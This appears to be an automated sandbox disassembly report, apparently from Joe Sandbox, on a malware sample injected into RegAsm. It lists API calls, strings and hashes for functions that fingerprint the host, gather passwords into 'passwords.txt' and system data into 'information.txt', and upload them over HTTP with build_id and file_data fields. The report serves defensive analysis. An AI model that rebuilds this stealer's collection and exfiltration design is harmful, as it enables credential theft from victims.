lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
ExitProcess.KERNEL32 ref: 00404CDC
InternetCloseHandle.WININET(?), ref: 00404CEC

Strings

--, xrefs: 00404544
", xrefs: 00404B0F
------, xrefs: 0040479D
", xrefs: 0040486F
------, xrefs: 004048EE
------, xrefs: 00404A3D
file_data, xrefs: 00404AE5
ERROR, xrefs: 00404C44
block, xrefs: 00404CC3
", xrefs: 00404720
ERROR, xrefs: 00404DBB
------, xrefs: 0040464D
/, xrefs: 00404C97
", xrefs: 004049C1
------, xrefs: 0040451D
build_id, xrefs: 00404845

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
API String ID: 2658035217-3274521816
Opcode ID: 26bd98618f30c9eb2cee9e0d677885fdd13dfea0198d3fb2b6cb65d70c28906f
Instruction ID: 54bf99952b07ca635b4dbb742466eb9cc47fccd6506565e52ffe32b6450c3b94
Opcode Fuzzy Hash: 26bd98618f30c9eb2cee9e0d677885fdd13dfea0198d3fb2b6cb65d70c28906f
Instruction Fuzzy Hash: 67624471C00149EEDB05EBE5C955ADEBBB8AF19308F14419EE50173182EFB86BC8CB65

Function 00405C89 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00405C8E

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D39
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405ED8
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405F0F
lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00426AC8,00000000), ref: 00406309
lstrlenA.KERNEL32(00000000), ref: 0040631A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406324
HeapAlloc.KERNEL32(00000000), ref: 0040632B
lstrlenA.KERNEL32(00000000), ref: 0040633C
memcpy.MSVCRT ref: 0040634D
lstrlenA.KERNEL32(00000000), ref: 0040635E
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00406377
memcpy.MSVCRT ref: 00406380
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00406393
HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063A7
InternetReadFile.WININET(?,?,000000C7,?), ref: 004063FB
InternetCloseHandle.WININET(?), ref: 00406406
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F34

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

InternetCloseHandle.WININET(?), ref: 0040640F
InternetCloseHandle.WININET(?), ref: 00406418
StrCmpCA.SHLWAPI(?), ref: 00405D50

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Strings

", xrefs: 0040600D
------, xrefs: 0040608A
", xrefs: 004062AD
(, xrefs: 0040645A
mode, xrefs: 00406283
------, xrefs: 00405DD2
------, xrefs: 004061DB
build_id, xrefs: 00406132
", xrefs: 0040615C
------, xrefs: 00405F3A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$($------$------$------$------$build_id$mode
API String ID: 2237346945-1447386369
Opcode ID: f1a8411d89a439de9845aa1f76b014b8e975a4f2724e544ce476159d836ef4b4
Instruction ID: 59509596116fb6aeaa00f607077bbbfabce1420f2cc7c4e586f92d12dc342ca6
Opcode Fuzzy Hash: f1a8411d89a439de9845aa1f76b014b8e975a4f2724e544ce476159d836ef4b4
Instruction Fuzzy Hash: 59422571801149EEDB05EBE5C956AEEBBB89F19308F10419EF50173182DFB92BC8CB65

Function 00415A32 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1004
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00415A37

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410A20: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004275CB), ref: 00410A2E
Part of subcall function 00410A20: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A35
Part of subcall function 00410A20: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004275CB), ref: 00410A41
Part of subcall function 00410A20: wsprintfA.USER32 ref: 00410A6C

Part of subcall function 004111FD: memset.MSVCRT ref: 00411223
Part of subcall function 004111FD: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004275CB,?,?,00000000), ref: 0041123F
Part of subcall function 004111FD: RegQueryValueExA.KERNEL32(004275CB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041125E
Part of subcall function 004111FD: CharToOemA.USER32(?,?), ref: 0041127B

Part of subcall function 0041128A: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041129B

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004112C5: _EH_prolog.MSVCRT ref: 004112CA
Part of subcall function 004112C5: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004112ED
Part of subcall function 004112C5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041131F
Part of subcall function 004112C5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411362
Part of subcall function 004112C5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00411369

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00427778,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042776C,00000000), ref: 00415D50

Part of subcall function 00411DE9: OpenProcess.KERNEL32(00000410,00000000,`]A), ref: 00411E01
Part of subcall function 00411DE9: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411E1C
Part of subcall function 00411DE9: CloseHandle.KERNEL32(00000000), ref: 00411E23

Part of subcall function 00411433: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory), ref: 00411447
Part of subcall function 00411433: HeapAlloc.KERNEL32(00000000,?,?,?,00415E45,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041144E

Part of subcall function 00411564: _EH_prolog.MSVCRT ref: 00411569
Part of subcall function 00411564: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 00411581
Part of subcall function 00411564: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 00411592
Part of subcall function 00411564: CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?), ref: 004115AC
Part of subcall function 00411564: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004115E2
Part of subcall function 00411564: VariantInit.OLEAUT32(?), ref: 0041163D

Part of subcall function 0041170D: _EH_prolog.MSVCRT ref: 00411712
Part of subcall function 0041170D: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?,00000000), ref: 0041172A
Part of subcall function 0041170D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 0041173B
Part of subcall function 0041170D: CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?), ref: 00411755
Part of subcall function 0041170D: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041178B
Part of subcall function 0041170D: VariantInit.OLEAUT32(?), ref: 004117DE

Part of subcall function 004109E5: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00415FEC,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000), ref: 004109F1
Part of subcall function 004109E5: HeapAlloc.KERNEL32(00000000,?,?,00415FEC,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ), ref: 004109F8
Part of subcall function 004109E5: GetComputerNameA.KERNEL32(00000000,00000000), ref: 00410A0C

Part of subcall function 004109B3: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041872B,00427716), ref: 004109BF
Part of subcall function 004109B3: HeapAlloc.KERNEL32(00000000,?,?,?,0041872B,00427716), ref: 004109C6
Part of subcall function 004109B3: GetUserNameA.ADVAPI32(00000000,?), ref: 004109DA

Part of subcall function 00411188: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 0041119D
Part of subcall function 00411188: GetDeviceCaps.GDI32(00000000,00000008), ref: 004111A8
Part of subcall function 00411188: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004111B3
Part of subcall function 00411188: ReleaseDC.USER32(00000000,00000000), ref: 004111BE
Part of subcall function 00411188: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?), ref: 004111CA
Part of subcall function 00411188: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?,00000000), ref: 004111D1
Part of subcall function 00411188: wsprintfA.USER32 ref: 004111E3

Part of subcall function 00410ACD: _EH_prolog.MSVCRT ref: 00410AD2
Part of subcall function 00410ACD: GetKeyboardLayoutList.USER32(00000000,00000000,00427307,00000001,?,00000000), ref: 00410B04
Part of subcall function 00410ACD: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 00410B12
Part of subcall function 00410ACD: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 00410B1D
Part of subcall function 00410ACD: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 00410B47
Part of subcall function 00410ACD: LocalFree.KERNEL32(?), ref: 00410BEB

Part of subcall function 00410A7A: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ), ref: 00410A8B
Part of subcall function 00410A7A: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410A92
Part of subcall function 00410A7A: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410AA1
Part of subcall function 00410A7A: wsprintfA.USER32 ref: 00410ABF

Part of subcall function 00410C00: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C), ref: 00410C14
Part of subcall function 00410C00: HeapAlloc.KERNEL32(00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C,00000000,?), ref: 00410C1B
Part of subcall function 00410C00: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 00410C39
Part of subcall function 00410C00: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 00410C55

Part of subcall function 00410C9C: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410CEF
Part of subcall function 00410C9C: wsprintfA.USER32 ref: 00410D35

Part of subcall function 00410C69: GetSystemInfo.KERNEL32(00000000), ref: 00410C76
Part of subcall function 00410C69: wsprintfA.USER32 ref: 00410C8B

Part of subcall function 00410D69: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784), ref: 00410D77
Part of subcall function 00410D69: HeapAlloc.KERNEL32(00000000), ref: 00410D7E
Part of subcall function 00410D69: GlobalMemoryStatusEx.KERNEL32 ref: 00410D9E
Part of subcall function 00410D69: wsprintfA.USER32 ref: 00410DC4

Part of subcall function 00410DD2: _EH_prolog.MSVCRT ref: 00410DD7
Part of subcall function 00410DD2: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410E3F

Part of subcall function 004110AB: _EH_prolog.MSVCRT ref: 004110B0
Part of subcall function 004110AB: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004110EB
Part of subcall function 004110AB: Process32First.KERNEL32(00000000,00000128), ref: 004110FC
Part of subcall function 004110AB: Process32Next.KERNEL32(?,00000128), ref: 00411164
Part of subcall function 004110AB: CloseHandle.KERNEL32(?,?,00000000), ref: 00411171

Part of subcall function 00410E59: _EH_prolog.MSVCRT ref: 00410E5E
Part of subcall function 00410E59: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042731F,00000001,00000000), ref: 00410EA6

Part of subcall function 00410E59: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410EF0
Part of subcall function 00410E59: wsprintfA.USER32 ref: 00410F1A
Part of subcall function 00410E59: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410F37
Part of subcall function 00410E59: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410F61
Part of subcall function 00410E59: lstrlenA.KERNEL32(?), ref: 00410F76
Part of subcall function 00410E59: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00427348), ref: 00410FF6

lstrlenA.KERNEL32(00000000,00000000,?,004278C0,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,004278B0), ref: 004167A8

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

HWID: , xrefs: 00415C92
[Hardware], xrefs: 00416305
Path: , xrefs: 00415D26
[Processes], xrefs: 00416601
Threads: , xrefs: 0041644B
VideoCard: , xrefs: 00416555
TimeZone: , xrefs: 00416280
Display Resolution: , xrefs: 004160BB
RAM: , xrefs: 004164D0
AV: , xrefs: 00415F29
Keyboard Languages: , xrefs: 0041614F
GUID: , xrefs: 00415BFE
Version: , xrefs: 00415A53
Local Time: , xrefs: 004161EF
information.txt, xrefs: 004167C3
User Name: , xrefs: 0041603C
Work Dir: In memory, xrefs: 00415DC2
Processor: , xrefs: 00416335
T, xrefs: 004167DC
Install Date: , xrefs: 00415E95
MachineID: , xrefs: 00415B7F
[Software], xrefs: 004166AD
Computer Name: , xrefs: 00415FBD
Date: , xrefs: 00415B00
Windows: , xrefs: 00415E16
Cores: , xrefs: 004163C6

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 722754166-3257470747
Opcode ID: bfa6ec14baec352ab957f2e9b56a43ba5cc364f00860c0286a06aec8a3f4c335
Instruction ID: d5ba8c6de4fda0102b2d8ee6596fa508dd31ea5481e8040501ad09f872d8dabc
Opcode Fuzzy Hash: bfa6ec14baec352ab957f2e9b56a43ba5cc364f00860c0286a06aec8a3f4c335
Instruction Fuzzy Hash: 45920D71C05149EDDB05E7E5C956AEEBBB85F28348F10419EA142731C2DFB82BC8CAB5

Function 0040CF01 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040CF06

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00426BF8,?,?,?,00426BF2,?,00000000), ref: 0040CFFE
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D05F
RtlAllocateHeap.NTDLL(00000000), ref: 0040D066
lstrlenA.KERNEL32(00000000,00000000), ref: 0040D0F6
lstrcat.KERNEL32(00000000), ref: 0040D10D
lstrcat.KERNEL32(00000000,00000000), ref: 0040D11F
lstrcat.KERNEL32(00000000,00426BFC), ref: 0040D12D
lstrcat.KERNEL32(00000000,00000000), ref: 0040D13F
lstrcat.KERNEL32(00000000,00426C00), ref: 0040D14D
lstrcat.KERNEL32(00000000), ref: 0040D15C
lstrcat.KERNEL32(00000000,00000000), ref: 0040D16E
lstrcat.KERNEL32(00000000,00426C04), ref: 0040D17C
lstrcat.KERNEL32(00000000), ref: 0040D18B
lstrcat.KERNEL32(00000000,00000000), ref: 0040D19D
lstrcat.KERNEL32(00000000,00426C08), ref: 0040D1AB
lstrcat.KERNEL32(00000000), ref: 0040D1BA
lstrcat.KERNEL32(00000000,00000000), ref: 0040D1CC
lstrcat.KERNEL32(00000000,00426C0C), ref: 0040D1DA
lstrcat.KERNEL32(00000000,00426C10), ref: 0040D1E8
lstrlenA.KERNEL32(00000000), ref: 0040D21C
memset.MSVCRT ref: 0040D26F
DeleteFileA.KERNEL32(00000000), ref: 0040D29C

Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

Strings

passwords.txt, xrefs: 0040D22E

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
String ID: passwords.txt
API String ID: 3298853120-347816968
Opcode ID: db8ddd7744e31c2ba4826c6f91dc94e958a462fcb524ac0ae03073d557bcf216
Instruction ID: 1272b24bb8ff4ed9934adf0ead2cd7faa73ad4671de3ebcdde783529059c2fdd
Opcode Fuzzy Hash: db8ddd7744e31c2ba4826c6f91dc94e958a462fcb524ac0ae03073d557bcf216
Instruction Fuzzy Hash: 42C18D71800149EFDF05EBE1DD1AAEEBB75AF19304F10401AF511B21E2DBB81A88CF65

Function 00414D3A Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 825
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00414D3F

Part of subcall function 004142D8: _EH_prolog.MSVCRT ref: 004142DD

Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414F0B
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414F8C

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00413DAA: _EH_prolog.MSVCRT ref: 00413DAF
Part of subcall function 00413DAA: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E0D

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004150B8
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415139
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415265
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004152E6
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415412
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415493
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004155BF
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041563A
Sleep.KERNEL32(0000EA60), ref: 00415649

Part of subcall function 00413E88: _EH_prolog.MSVCRT ref: 00413E8D
Part of subcall function 00413E88: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
Part of subcall function 00413E88: lstrlenA.KERNEL32(00000000), ref: 00413F26
Part of subcall function 00413E88: StrStrA.SHLWAPI(00000000,00000000), ref: 00413F4D
Part of subcall function 00413E88: lstrlenA.KERNEL32(00000000), ref: 00413F62
Part of subcall function 00413E88: lstrlenA.KERNEL32(00000000), ref: 00413F7D

Strings

ERROR, xrefs: 0041512B
ERROR, xrefs: 0041562C
ERROR, xrefs: 00414EFD
ERROR, xrefs: 004150AA
ERROR, xrefs: 00415404
ERROR, xrefs: 00414F7E
